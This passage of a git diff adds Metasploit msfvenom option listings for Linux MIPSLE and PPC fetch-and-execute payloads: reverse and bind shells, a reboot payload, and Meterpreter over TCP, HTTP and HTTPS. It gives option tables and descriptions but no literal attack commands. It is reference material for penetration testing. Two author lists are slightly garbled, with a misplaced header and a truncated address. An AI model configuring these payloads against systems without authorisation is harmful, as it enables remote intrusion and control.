Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RyQJyqVGA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt new file mode 100644 index 0000000..402f32b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt @@ -0,0 +1,68 @@ + + Name: TFTP Fetch, Linux Reboot + Module: payload/cmd/linux/tftp/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZBLbJzxLV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..4a32e43 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt @@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vFbSaYWacCAG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..0f25ba4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MLjwAMCkf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..6924112 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LHZwVOPa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..3278b7d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/ppc/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LBoqZIckdYz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d13edaf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/ppc/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gvBMJcvItb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..603c04d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kOpfhMJhgHG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing 